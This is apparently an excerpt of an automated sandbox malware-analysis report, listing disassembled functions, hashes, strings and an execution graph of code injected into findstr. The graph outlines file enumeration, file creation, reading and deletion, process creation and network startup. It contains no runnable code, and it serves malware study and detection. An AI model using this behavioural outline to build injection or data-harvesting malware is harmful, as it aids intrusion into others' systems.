                                                • Instruction ID: c3b277522ea9d2cb8ccd21fae58bece0b9f8373de8f20d1b1a2f0ed5f248d638
                                                • Opcode Fuzzy Hash: 94a691114064afd3b06f4a7249f037653bb0ce1c10124f33504767564478e7fc
                                                • Instruction Fuzzy Hash: 4690022A321410060145B558064450B45A597D63513D5C015F641A590CC6258D695732
                                                Function 058C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 3c3ebd2abaf183f79674e8668d8e15843a04af5e87211478a4b469b3f7b2c1fe
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Function 058C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: de306fb11a66c93039e95bdac05ecd4beeb90f685b41f5743ad9929f96a4280b
                                                • Instruction ID: b8b8133937d35484b50f03cb6e4c44b4e43a17056b0d5d4cf19e3c576f0a7098
                                                • Opcode Fuzzy Hash: de306fb11a66c93039e95bdac05ecd4beeb90f685b41f5743ad9929f96a4280b
                                                • Instruction Fuzzy Hash: 6151EBB5A0411ABFCB14DB9C889497EFBF9FB0C200B54816DECDAD7681E634DE0487A0
                                                Function 058B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 058F4725
                                                • ExecuteOptions, xrefs: 058F46A0
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 058F46FC
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 058F4655
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 058F4742
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 058F4787
                                                • Execute=1, xrefs: 058F4713
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: a5b16745831a13250ddea4139bf42c83e2b9f5ab22de27637ce4ef3946721bec
                                                • Instruction ID: 8de5f2b2e89815e4d8e201249c3e70742734e39bdc983c9f3e63af8b85725f5d
                                                • Opcode Fuzzy Hash: a5b16745831a13250ddea4139bf42c83e2b9f5ab22de27637ce4ef3946721bec
                                                • Instruction Fuzzy Hash: 9051E73160431D6AEF10EA68DC99FFA77ADFB49304F040099ED05E7291EBB09E45CB55
                                                Function 058CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: e6f8a4cfd6d4e893356fe3e41cd4c2b82b304ca20aa30439299803e5fd04c29d
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: 84816D70A49A499BDF24CE68C853BBEBFA2BF45352F98419DDC92E7290C734DC408B51
                                                Function 058BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Resource at %p, xrefs: 058F7B8E
                                                • RTL: Re-Waiting, xrefs: 058F7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 058F7B7F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: 45b1070f30166bc987b065886515aa291dba8cf475965273fb6dd8d0f46332fb
                                                • Instruction ID: 1a8e9b0f80d436739cf9dcc25ee3a47e7db1cc29561ae338e43b47dd248b5fce
                                                • Opcode Fuzzy Hash: 45b1070f30166bc987b065886515aa291dba8cf475965273fb6dd8d0f46332fb
                                                • Instruction Fuzzy Hash: 214190317047069FE720DE298840B6AB7EAEB89711F100A1DED9AD7780DB71E905CB91
                                                Function 058BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058F728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 058F72A3
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 058F7294
                                                • RTL: Re-Waiting, xrefs: 058F72C1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 69f3288af026b31257bed2286e4041e1c809c9460ff751fb7b0ae5b90a44f3ee
                                                • Instruction ID: aa99eb68d245e4a3ade4dca369a9ddfa8b295d8daedcf2bcc4a2be51b9dc1640
                                                • Opcode Fuzzy Hash: 69f3288af026b31257bed2286e4041e1c809c9460ff751fb7b0ae5b90a44f3ee
                                                • Instruction Fuzzy Hash: 2A41AC31704206ABE721DE25CC41FAAB7E6FB88715F100619ED56EB380DB71EC52CB92
                                                Function 058C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: e9491f2c6b8e202d4cf83bbe625c599dc4217d1d2f9e5faccd44b52b0f84549d
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: 7391AE71E1420A9ADB24DE69C881ABEBFA6FF45720F14459EEC65E72C0E730DD418F20
                                                Function 05889126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: a13cae819f4789500a9d182e33b667fb440b211340f02915b4e1f8a87da6addf
                                                • Instruction ID: ec018552d137b5ccff5d8adadf4cf4045f39d5c9233c3e71e9c0e8672724541c
                                                • Opcode Fuzzy Hash: a13cae819f4789500a9d182e33b667fb440b211340f02915b4e1f8a87da6addf
                                                • Instruction Fuzzy Hash: 98812975D042699BDB25DB54CC44BEAB7B8BB09710F0441EAED1AF7240D7309E81CFA1

                                                Execution Graph

                                                Execution Coverage:2.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.7%
                                                Total number of Nodes:419
                                                Total number of Limit Nodes:68
                                                execution_graph 80788 2e5efe0 80789 2e5f044 80788->80789 80813 2e56050 80789->80813 80791 2e5f174 80792 2e5f16d 80792->80791 80820 2e56160 80792->80820 80794 2e5f313 80795 2e5f1f0 80795->80794 80796 2e5f322 80795->80796 80824 2e5edc0 80795->80824 80797 2e68090 NtClose 80796->80797 80799 2e5f32c 80797->80799 80800 2e5f225 80800->80796 80801 2e5f230 80800->80801 80833 2e6a040 80801->80833 80803 2e5f259 80804 2e5f262 80803->80804 80805 2e5f278 80803->80805 80807 2e68090 NtClose 80804->80807 80836 2e5ecb0 CoInitialize 80805->80836 80808 2e5f26c 80807->80808 80810 2e5f286 80838 2e68090 80810->80838 80811 2e5f30c 80841 2e69f60 80811->80841 80815 2e56083 80813->80815 80814 2e560a7 80814->80792 80815->80814 80844 2e67c20 80815->80844 80817 2e560ca 80817->80814 80818 2e68090 NtClose 80817->80818 80819 2e5614a 80818->80819 80819->80792 80821 2e56185 80820->80821 80849 2e67a10 80821->80849 80825 2e5eddc 80824->80825 80854 2e54530 80825->80854 80827 2e5ee00 80827->80800 80828 2e5edf7 80828->80827 80829 2e54530 2 API calls 80828->80829 80830 2e5eecb 80829->80830 80831 2e54530 2 API calls 80830->80831 80832 2e5ef28 80830->80832 80831->80832 80832->80800 80862 2e683b0 80833->80862 80835 2e6a05b 80835->80803 80837 2e5ed15 80836->80837 80837->80810 80839 2e680ad 80838->80839 80840 2e680be NtClose 80839->80840 80840->80811 80865 2e68400 80841->80865 80843 2e69f79 80843->80794 80845 2e67c3a 80844->80845 80848 36c2ca0 LdrInitializeThunk 80845->80848 80846 2e67c66 80846->80817 80848->80846 80850 2e67a2d 80849->80850 80853 36c2c60 LdrInitializeThunk 80850->80853 80851 2e561f9 80851->80795 80853->80851 80856 2e54554 80854->80856 80855 2e5455b 80855->80828 80856->80855 80858 2e5457a 80856->80858 80861 2e6b420 LdrLoadDll 80856->80861 80859 2e545a7 80858->80859 80860 2e54594 LdrLoadDll 80858->80860 80859->80828 80860->80859 80861->80858 80863 2e683cd 80862->80863 80864 2e683de RtlAllocateHeap 80863->80864 80864->80835 80866 2e6841d 80865->80866 80867 2e6842e RtlFreeHeap 80866->80867 80867->80843 80868 2e557e0 80873 2e57c00 80868->80873 80870 2e55810 80872 2e5583c 80870->80872 80877 2e57b80 80870->80877 80874 2e57c13 80873->80874 80884 2e67620 80874->80884 80876 2e57c3e 80876->80870 80878 2e57bc4 80877->80878 80883 2e57be5 80878->80883 80890 2e67420 80878->80890 80880 2e57bd5 80881 2e57bf1 80880->80881 80882 2e68090 NtClose 80880->80882 80881->80870 80882->80883 80883->80870 80885 2e67690 80884->80885 80886 2e67641 80884->80886 80889 36c2dd0 LdrInitializeThunk 80885->80889 80886->80876 80887 2e676b5 80887->80876 80889->80887 80891 2e6748f 80890->80891 80892 2e67441 80890->80892 80895 36c4650 LdrInitializeThunk 80891->80895 80892->80880 80893 2e674b4 80893->80880 80895->80893 80896 2e67560 80897 2e675e1 80896->80897 80899 2e67581 80896->80899 80901 36c2ee0 LdrInitializeThunk 80897->80901 80898 2e67612 80901->80898 80902 2e5316c 80907 2e57880 80902->80907 80905 2e53191 80906 2e68090 NtClose 80906->80905 80908 2e5317c 80907->80908 80909 2e5789a 80907->80909 80908->80905 80908->80906 80913 2e677b0 80909->80913 80912 2e68090 NtClose 80912->80908 80914 2e677ca 80913->80914 80917 36c35c0 LdrInitializeThunk 80914->80917 80915 2e5796a 80915->80912 80917->80915 80920 2e49829 80921 2e497e2 80920->80921 80922 2e4981d 80921->80922 80923 2e4980a CreateThread 80921->80923 80924 2e49830 80925 2e49bd8 80924->80925 80926 2e4a0b3 80925->80926 80928 2e69bf0 80925->80928 80929 2e69c16 80928->80929 80934 2e44110 80929->80934 80931 2e69c22 80932 2e69c50 80931->80932 80938 2e646c0 80931->80938 80932->80926 80935 2e44111 80934->80935 80942 2e53260 80935->80942 80937 2e4411d 80937->80931 80939 2e6471a 80938->80939 80941 2e64727 80939->80941 80963 2e51740 80939->80963 80941->80932 80943 2e53277 80942->80943 80945 2e532a4 80943->80945 80947 2e53290 80943->80947 80955 2e67000 RtlFreeHeap LdrInitializeThunk 80943->80955 80948 2e68ae0 80945->80948 80947->80937 80950 2e68af8 80948->80950 80949 2e68b1c 80949->80947 80950->80949 80956 2e67710 80950->80956 80953 2e69f60 RtlFreeHeap 80954 2e68b8a 80953->80954 80954->80947 80955->80945 80957 2e6772d 80956->80957 80960 36c2c0a 80957->80960 80958 2e67759 80958->80953 80961 36c2c1f LdrInitializeThunk 80960->80961 80962 36c2c11 80960->80962 80961->80958 80962->80958 80964 2e5177b 80963->80964 80981 2e57990 80964->80981 80966 2e51783 80967 2e6a040 RtlAllocateHeap 80966->80967 80979 2e51a4c 80966->80979 80968 2e51799 80967->80968 80969 2e6a040 RtlAllocateHeap 80968->80969 80970 2e517aa 80969->80970 80971 2e6a040 RtlAllocateHeap 80970->80971 80973 2e517bb 80971->80973 80980 2e5184e 80973->80980 80996 2e567b0 NtClose LdrInitializeThunk LdrInitializeThunk 80973->80996 80974 2e54530 2 API calls 80975 2e51a0c 80974->80975 80976 2e51a46 80975->80976 80977 2e51a38 WSAStartup 80975->80977 80992 2e66de0 80976->80992 80977->80976 80979->80941 80980->80974 80982 2e579bc 80981->80982 80983 2e57880 2 API calls 80982->80983 80984 2e579df 80983->80984 80985 2e579e9 80984->80985 80988 2e57a01 80984->80988 80986 2e68090 NtClose 80985->80986 80989 2e579f4 80985->80989 80986->80989 80987 2e57a1d 80987->80966 80988->80987 80990 2e68090 NtClose 80988->80990 80989->80966 80991 2e57a13 80990->80991 80991->80966 80993 2e66e3a 80992->80993 80995 2e66e47 80993->80995 80997 2e51a60 80993->80997 80995->80979 80996->80980 81014 2e57c60 80997->81014 80999 2e51f55 80999->80995 81001 2e51c81 81023 2e6b170 81001->81023 81002 2e51a80 81002->80999 81018 2e6b040 81002->81018 81004 2e57c00 LdrInitializeThunk 81009 2e51cbe 81004->81009 81005 2e51c96 81007 2e51de2 81005->81007 81005->81009 81029 2e64740 81005->81029 81033 2e50710 81007->81033 81009->80999 81009->81004 81010 2e64740 LdrInitializeThunk 81009->81010 81012 2e50710 LdrInitializeThunk 81009->81012 81010->81009 81011 2e57c00 LdrInitializeThunk 81013 2e51dec 81011->81013 81012->81009 81013->81009 81013->81011 81015 2e57c6d 81014->81015 81016 2e57c93 81015->81016 81017 2e57c8c SetErrorMode 81015->81017 81016->81002 81017->81016 81019 2e6b056 81018->81019 81020 2e6b050 81018->81020 81021 2e6a040 RtlAllocateHeap 81019->81021 81020->81001 81022 2e6b07c 81021->81022 81022->81001 81024 2e6b0e0 81023->81024 81025 2e6a040 RtlAllocateHeap 81024->81025 81026 2e6b13d 81024->81026 81027 2e6b11a 81025->81027 81026->81005 81028 2e69f60 RtlFreeHeap 81027->81028 81028->81026 81030 2e6479a 81029->81030 81032 2e647bb 81030->81032 81036 2e558d0 81030->81036 81032->81005 81041 2e68310 81033->81041 81037 2e5588f 81036->81037 81038 2e55901 81037->81038 81039 2e67710 LdrInitializeThunk 81037->81039 81038->81032 81040 2e558a6 81039->81040 81040->81032 81042 2e6832a 81041->81042 81045 36c2c70 LdrInitializeThunk 81042->81045 81043 2e50732 81043->81013 81045->81043 81046 2e57e70 GetFileAttributesW 81047 2e57e81 81046->81047 81048 2e60eb0 81049 2e60ecc 81048->81049 81050 2e60ef4 81049->81050 81051 2e60f08 81049->81051 81053 2e68090 NtClose 81050->81053 81052 2e68090 NtClose 81051->81052 81054 2e60f11 81052->81054 81055 2e60efd 81053->81055 81058 2e6a080 RtlAllocateHeap 81054->81058 81057 2e60f1c 81058->81057 81059 2e5f8c0 81060 2e5f8dd 81059->81060 81061 2e54530 2 API calls 81060->81061 81062 2e5f8f8 81061->81062 81063 2e56b00 81064 2e56b2a 81063->81064 81067 2e57a30 81064->81067 81066 2e56b51 81068 2e57a4d 81067->81068 81074 2e67800 81068->81074 81070 2e57aa4 81070->81066 81071 2e57a9d 81071->81070 81079 2e678d0 81071->81079 81073 2e57acd 81073->81066 81075 2e67890 81074->81075 81077 2e67824 81074->81077 81084 36c2f30 LdrInitializeThunk 81075->81084 81076 2e678c9 81076->81071 81077->81071 81080 2e67972 81079->81080 81081 2e678f4 81079->81081 81085 36c2d10 LdrInitializeThunk 81080->81085 81081->81073 81082 2e679b7 81082->81073 81084->81076 81085->81082 81086 2e676c0 81087 2e676da 81086->81087 81090 36c2df0 LdrInitializeThunk 81087->81090 81088 2e67702 81090->81088 81101 2e65080 81102 2e650da 81101->81102 81104 2e650e7 81102->81104 81105 2e62c20 81102->81105 81106 2e62c5e 81105->81106 81107 2e54530 2 API calls 81106->81107 81109 2e62d57 81106->81109 81110 2e62c9e 81107->81110 81108 2e62cd1 Sleep 81108->81110 81109->81104 81110->81108 81110->81109 81111 2e61240 81116 2e6124f 81111->81116 81112 2e612dc 81113 2e61296 81114 2e69f60 RtlFreeHeap 81113->81114 81115 2e612a6 81114->81115 81116->81112 81116->81113 81117 2e612d7 81116->81117 81118 2e69f60 RtlFreeHeap 81117->81118 81118->81112 81119 2e68000 81120 2e68069 81119->81120 81122 2e68021 81119->81122 81121 2e6807f NtDeleteFile 81120->81121 81123 2e67dc0 81124 2e67e6c 81123->81124 81126 2e67de8 81123->81126 81125 2e67e82 NtCreateFile 81124->81125 81127 2e57082 81128 2e5704b 81127->81128 81131 2e5708c 81127->81131 81129 2e57055 81128->81129 81161 2e564b0 NtClose LdrInitializeThunk LdrInitializeThunk 81128->81161 81133 2e570fc 81131->81133 81134 2e5ac80 81131->81134 81135 2e5aca6 81134->81135 81136 2e5aebc 81135->81136 81162 2e68490 81135->81162 81136->81133 81138 2e5ad19 81138->81136 81139 2e6b170 2 API calls 81138->81139 81140 2e5ad35 81139->81140 81140->81136 81141 2e5ae00 81140->81141 81143 2e67710 LdrInitializeThunk 81140->81143 81142 2e5ae1f 81141->81142 81144 2e55760 LdrInitializeThunk 81141->81144 81149 2e5aea4 81142->81149 81168 2e672e0 81142->81168 81145 2e5ad8e 81143->81145 81144->81142 81145->81141 81146 2e5ad97 81145->81146 81146->81136 81147 2e5ade8 81146->81147 81148 2e5adc6 81146->81148 81165 2e55760 81146->81165 81150 2e57c00 LdrInitializeThunk 81147->81150 81183 2e638c0 LdrInitializeThunk 81148->81183 81155 2e57c00 LdrInitializeThunk 81149->81155 81154 2e5adf6 81150->81154 81154->81133 81157 2e5aeb2 81155->81157 81156 2e5ae7b 81173 2e67380 81156->81173 81157->81133 81159 2e5ae95 81178 2e674c0 81159->81178 81161->81129 81163 2e684aa 81162->81163 81164 2e684bb CreateProcessInternalW 81163->81164 81164->81138 81166 2e678d0 LdrInitializeThunk 81165->81166 81167 2e5579e 81166->81167 81167->81148 81169 2e6734f 81168->81169 81170 2e67301 81168->81170 81184 36c39b0 LdrInitializeThunk 81169->81184 81170->81156 81171 2e67374 81171->81156 81174 2e673ef 81173->81174 81176 2e673a1 81173->81176 81185 36c4340 LdrInitializeThunk 81174->81185 81175 2e67414 81175->81159 81176->81159 81179 2e6752f 81178->81179 81180 2e674e1 81178->81180 81186 36c2fb0 LdrInitializeThunk 81179->81186 81180->81149 81181 2e67554 81181->81149 81183->81147 81184->81171 81185->81175 81186->81181 81187 2e60a41 81199 2e67f20 81187->81199 81189 2e60a62 81190 2e60a95 81189->81190 81191 2e60a80 81189->81191 81192 2e68090 NtClose 81190->81192 81193 2e68090 NtClose 81191->81193 81196 2e60a9e 81192->81196 81194 2e60a89 81193->81194 81195 2e60aca 81196->81195 81197 2e69f60 RtlFreeHeap 81196->81197 81198 2e60abe 81197->81198 81200 2e67f41 81199->81200 81201 2e67fb9 81199->81201 81200->81189 81202 2e67fcf NtReadFile 81201->81202 81202->81189 81203 2e582ce 81204 2e582d3 81203->81204 81206 2e58292 81204->81206 81207 2e56d10 LdrInitializeThunk LdrInitializeThunk 81204->81207 81207->81206 81208 2e527ce 81209 2e52805 81208->81209 81210 2e56050 2 API calls 81209->81210 81211 2e52810 81210->81211 81212 2e596d0 81213 2e596d7 81212->81213 81213->81212 81214 2e596f8 81213->81214 81215 2e69f60 RtlFreeHeap 81213->81215 81215->81214 81216 2e50b90 81217 2e50b97 81216->81217 81218 2e54530 2 API calls 81217->81218 81219 2e50bc5 81218->81219 81220 2e50c0a 81219->81220 81221 2e50bf9 PostThreadMessageW 81219->81221 81221->81220 81222 2e5a790 81227 2e5a4c0 81222->81227 81224 2e5a79d 81239 2e5a160 81224->81239 81226 2e5a7b9 81228 2e5a4e5 81227->81228 81229 2e5a622 81228->81229 81249 2e62510 81228->81249 81229->81224 81231 2e5a639 81231->81224 81232 2e5a630 81232->81231 81234 2e5a721 81232->81234 81260 2e59bc0 81232->81260 81235 2e5a779 81234->81235 81269 2e59f20 81234->81269 81237 2e69f60 RtlFreeHeap 81235->81237 81238 2e5a780 81237->81238 81238->81224 81240 2e5a176 81239->81240 81243 2e5a181 81239->81243 81241 2e6a040 RtlAllocateHeap 81240->81241 81241->81243 81242 2e5a197 81242->81226 81243->81242 81244 2e5a48e 81243->81244 81247 2e59bc0 RtlFreeHeap 81243->81247 81248 2e59f20 RtlFreeHeap 81243->81248 81245 2e5a4a7 81244->81245 81246 2e69f60 RtlFreeHeap 81244->81246 81245->81226 81246->81245 81247->81243 81248->81243 81250 2e6251e 81249->81250 81251 2e62525 81249->81251 81250->81232 81252 2e54530 2 API calls 81251->81252 81253 2e62557 81252->81253 81254 2e62566 81253->81254 81273 2e61fe0 LdrLoadDll LdrLoadDll 81253->81273 81256 2e6a040 RtlAllocateHeap 81254->81256 81259 2e62701 81254->81259 81258 2e6257f 81256->81258 81257 2e69f60 RtlFreeHeap 81257->81259 81258->81257 81258->81259 81259->81232 81261 2e59be6 81260->81261 81274 2e5d3e0 81261->81274 81263 2e59c4d 81265 2e59dd0 81263->81265 81267 2e59c6b 81263->81267 81264 2e59db5 81264->81232 81265->81264 81266 2e59a80 RtlFreeHeap 81265->81266 81266->81265 81267->81264 81279 2e59a80 81267->81279 81270 2e59f46 81269->81270 81271 2e5d3e0 RtlFreeHeap 81270->81271 81272 2e59fc2 81271->81272 81272->81234 81273->81254 81276 2e5d3f6 81274->81276 81275 2e5d403 81275->81263 81276->81275 81277 2e69f60 RtlFreeHeap 81276->81277 81278 2e5d43c 81277->81278 81278->81263 81280 2e59a96 81279->81280 81283 2e5d450 81280->81283 81282 2e59b9c 81282->81267 81285 2e5d45d 81283->81285 81284 2e5d50c 81284->81282 81285->81284 81286 2e69f60 RtlFreeHeap 81285->81286 81286->81284 81287 2e5bf10 81289 2e5bf39 81287->81289 81288 2e5c03c 81289->81288 81290 2e5bfe0 FindFirstFileW 81289->81290 81290->81288 81291 2e5bffb 81290->81291 81292 2e5c023 FindNextFileW 81291->81292 81292->81291 81293 2e5c035 FindClose 81292->81293 81293->81288 81294 2e5711c 81295 2e570cf 81294->81295 81297 2e57124 81294->81297 81296 2e570fc 81295->81296 81298 2e5ac80 9 API calls 81295->81298 81298->81296 81299 36c2ad0 LdrInitializeThunk

                                                Executed Functions

                                                Function 02E5BF10 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02E5BFF1
                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02E5C02E
                                                • FindClose.KERNELBASE(?), ref: 02E5C039
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: 03df0c96aadce4d9b275498f232f119dc3e907a31d9c2f37b287d084dc2341f8
                                                • Instruction ID: 37c35c0fe69892d6fb7ca4c410917133015943b4bccaf770ca39437b850c2eff
                                                • Opcode Fuzzy Hash: 03df0c96aadce4d9b275498f232f119dc3e907a31d9c2f37b287d084dc2341f8
                                                • Instruction Fuzzy Hash: 05319271980318BBDB21DF60CC85FFF777D9F44758F249559B908A7180DB70AA858BA0
                                                Function 02E67DC0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02E67EB3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 2e40ff50122b8e0142a13011b578975d71dfa10266604aed4942e60d3e816b6c
                                                • Instruction ID: 54baf6000d415dc80814203ebe755d970e78da90ce795bc45b2d05739d79df99
                                                • Opcode Fuzzy Hash: 2e40ff50122b8e0142a13011b578975d71dfa10266604aed4942e60d3e816b6c
                                                • Instruction Fuzzy Hash: 6731D0B5A44608AFCB14DF99D880EEEB7B9EF8C754F108219F918A7340D730A951CFA4
                                                Function 02E67F20 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02E67FF8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: f604e84cb98246461505d61f8bac19005c11d48fe1166f6f44754967ebc154b1
                                                • Instruction ID: 4bc270fa5ae61cef6339df1d82d2320801a6f7b906d106c86750570eed01f49f
                                                • Opcode Fuzzy Hash: f604e84cb98246461505d61f8bac19005c11d48fe1166f6f44754967ebc154b1
                                                • Instruction Fuzzy Hash: 8E31C2B5A40208AFCB14DF99D881EEFB7B9EF8C754F118219F918A7340D770A951CBA4
                                                Function 02E68000 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: b325f9c68976874d70c3d730cd674c32c6df172f102c009210c1a8c47f6ab067
                                                • Instruction ID: a098023d586cf63a7d5cb15449a68cd584c83a68d45ee31d943a8a6625cdd3a2
                                                • Opcode Fuzzy Hash: b325f9c68976874d70c3d730cd674c32c6df172f102c009210c1a8c47f6ab067
                                                • Instruction Fuzzy Hash: 0701C071680304BFD620EB69DC09FBB736DDF88750F508509FA09AB280D7B179118BE5
                                                Function 02E68090 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02E680C7
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
